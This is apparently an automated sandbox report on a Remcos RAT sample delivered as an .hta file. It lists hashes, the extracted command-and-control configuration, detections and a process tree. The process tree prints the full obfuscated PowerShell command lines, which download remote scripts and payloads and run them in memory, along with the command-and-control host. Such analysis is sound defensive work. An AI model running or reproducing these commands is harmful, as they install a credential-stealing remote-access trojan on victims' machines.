remcos | c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec

Analysis

max time kernel
149s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-01-2025 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec.hta
Size

491KB
MD5

4b953e9801ac2ec60bf284162ed6793d
SHA1

090650754ac26c80128fed9b425000f3167551f4
SHA256

c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec
SHA512

f5d19a017a961229db0c10e06fe1da6a78693490d2928a6931ad5945ea93fa6b7bc193ae4c89f527702003293a05e7aba4618bba1c24508ef36015609ab4aa5a
SSDEEP

768:PnQVWUUGY6qZFKN9xv7RmzmBLStxuzHtu1Dj0YNYlBdNpdCb8sOUw8Qp3/GHxwv2:JRkKyMIBK2r0a8i4h

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4732-110-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2360-109-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/436-108-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2360-109-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4732-110-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	632	powershell.exe
18	2636	powershell.exe
19	2636	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
632	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2636	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2636 set thread context of 3156	2636	powershell.exe	105
PID 3156 set thread context of 4732	3156	CasPol.exe	108
PID 3156 set thread context of 2360	3156	CasPol.exe	109
PID 3156 set thread context of 436	3156	CasPol.exe	111

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
632	powershell.exe
632	powershell.exe
2636	powershell.exe
2636	powershell.exe
436	CasPol.exe
436	CasPol.exe
4732	CasPol.exe
4732	CasPol.exe
4732	CasPol.exe
4732	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
3156	CasPol.exe
3156	CasPol.exe
3156	CasPol.exe
3156	CasPol.exe
3156	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	436	CasPol.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 2236	4936	mshta.exe	83
PID 4936 wrote to memory of 2236	4936	mshta.exe	83
PID 4936 wrote to memory of 2236	4936	mshta.exe	83
PID 2236 wrote to memory of 632	2236	cmd.exe	85
PID 2236 wrote to memory of 632	2236	cmd.exe	85
PID 2236 wrote to memory of 632	2236	cmd.exe	85
PID 632 wrote to memory of 1688	632	powershell.exe	89
PID 632 wrote to memory of 1688	632	powershell.exe	89
PID 632 wrote to memory of 1688	632	powershell.exe	89
PID 1688 wrote to memory of 1816	1688	csc.exe	90
PID 1688 wrote to memory of 1816	1688	csc.exe	90
PID 1688 wrote to memory of 1816	1688	csc.exe	90
PID 632 wrote to memory of 2020	632	powershell.exe	97
PID 632 wrote to memory of 2020	632	powershell.exe	97
PID 632 wrote to memory of 2020	632	powershell.exe	97
PID 2020 wrote to memory of 2636	2020	WScript.exe	98
PID 2020 wrote to memory of 2636	2020	WScript.exe	98
PID 2020 wrote to memory of 2636	2020	WScript.exe	98
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 2636 wrote to memory of 3156	2636	powershell.exe	105
PID 3156 wrote to memory of 4572	3156	CasPol.exe	107
PID 3156 wrote to memory of 4572	3156	CasPol.exe	107
PID 3156 wrote to memory of 4572	3156	CasPol.exe	107
PID 3156 wrote to memory of 4732	3156	CasPol.exe	108
PID 3156 wrote to memory of 4732	3156	CasPol.exe	108
PID 3156 wrote to memory of 4732	3156	CasPol.exe	108
PID 3156 wrote to memory of 4732	3156	CasPol.exe	108
PID 3156 wrote to memory of 2360	3156	CasPol.exe	109
PID 3156 wrote to memory of 2360	3156	CasPol.exe	109
PID 3156 wrote to memory of 2360	3156	CasPol.exe	109
PID 3156 wrote to memory of 2360	3156	CasPol.exe	109
PID 3156 wrote to memory of 1428	3156	CasPol.exe	110
PID 3156 wrote to memory of 1428	3156	CasPol.exe	110
PID 3156 wrote to memory of 1428	3156	CasPol.exe	110
PID 3156 wrote to memory of 436	3156	CasPol.exe	111
PID 3156 wrote to memory of 436	3156	CasPol.exe	111
PID 3156 wrote to memory of 436	3156	CasPol.exe	111
PID 3156 wrote to memory of 436	3156	CasPol.exe	111

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:632
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2z32j2pg\2z32j2pg.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1688
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC796.tmp" "c:\Users\Admin\AppData\Local\Temp\2z32j2pg\CSC77AA82DE2F0447E1A58926B16531BEA0.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1816
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2020
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2636
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3156
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ucspyyncttqbyuoevnokh"
        7⤵
        
        PID:4572
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ucspyyncttqbyuoevnokh"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4732
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\eefhzqywhcigiicieybdkvdou"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2360
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hykazjjydkalkoymnjnfviqfddgj"
        7⤵
        
        PID:1428
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hykazjjydkalkoymnjnfviqfddgj"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
ba127156e453b28f7cc2e326286379f4

SHA1
d217903a9ab72f3225df47df13ba4b5e32a4bde7

SHA256
0f8ad807cbcf71c1a1836abf61fbb0209cdf6259357350a1fe409160958b0273

SHA512
672976573818e723101b9ca2358120d01a99632f48c5d9faf4848508f25f297f7f649c7ecdb32df4cea156661b4e3c966eed12b45e65fc53d7dd24eb468fbe1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\2z32j2pg\2z32j2pg.dll

Filesize
3KB

MD5
02c78395017a4220a1f3371c209fb069

SHA1
2c33d2982eb4eda32a382282d057ea3470d626dc

SHA256
a8a2f6e5143877a60e42457d8722660a462aa3b6f60d3d853f4a7f0cfab1e8a5

SHA512
e52392d82d2c1ca947cc53f220c258a2d7b21650c6fa197daa03d570c99a198d93de4e636703a770c8a0345bbca2239e7f3cddb9ed3875d2f2964e34959260cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC796.tmp

Filesize
1KB

MD5
e8403c6bc813a4a9748bdcc460496bb9

SHA1
2297f308805804da3c9210ed101a201ad96ac969

SHA256
b897674ef34842513f04e6fb37b0e4054d1b867f51ff53a83d86ff5093b98c73

SHA512
34566f3601ef8b5f0d371ffa93670ff7d12cf325a559f0566167d4b8de7a6e3f50e4ce3231f3053ad1aaa141f0b51ab8fda81c33cf088d12e00cf7cda09cddc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_llg1n25h.o5s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ucspyyncttqbyuoevnokh

Filesize
4KB

MD5
c3c5f2de99b7486f697634681e21bab0

SHA1
00f90d495c0b2b63fde6532e033fdd2ade25633d

SHA256
76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

SHA512
7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2z32j2pg\2z32j2pg.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2z32j2pg\2z32j2pg.cmdline

Filesize
369B

MD5
fbb7bd0e863919cfa7c3977a58d29bcd

SHA1
cf77a4c457d5d460694748596d883bcb02af03e6

SHA256
d6019eb671bbfb0199301f92548112d51109e4eb7eeaad350de73d10789f9422

SHA512
9e96f2c5ca1ba146ea29be99b62eda0124b78a2f264d397caf9fb81ae2cc74359111e374bb589f4eab44e2922b885af7e2f0d8fb34a97df4929058e59dac3274

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2z32j2pg\CSC77AA82DE2F0447E1A58926B16531BEA0.TMP

Filesize
652B

MD5
6680d3466f8ddafbe7a20ec7439eec0d

SHA1
b72571d58b753037a244f6157a1cf88aa028f9d1

SHA256
5c980aad2355d91779149c1fef84fc82151d0330037301394944d6a0f48eb94a

SHA512
fb19c377cef1de90bf8cdfb4c8eeba5acc163442baec0dbfc4c3321dcd9cd0161ca83f7feaa5c55bcc0f5528778d4a6292f7c7c7eb052ad419b8acecfc63e21e

Download Submit
memory/436-108-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/436-105-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/436-106-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/632-67-0x0000000007B70000-0x0000000007B92000-memory.dmp

Filesize
136KB

Download
memory/632-20-0x00000000068D0000-0x0000000006902000-memory.dmp

Filesize
200KB

Download
memory/632-23-0x000000006D290000-0x000000006D5E4000-memory.dmp

Filesize
3.3MB

Download
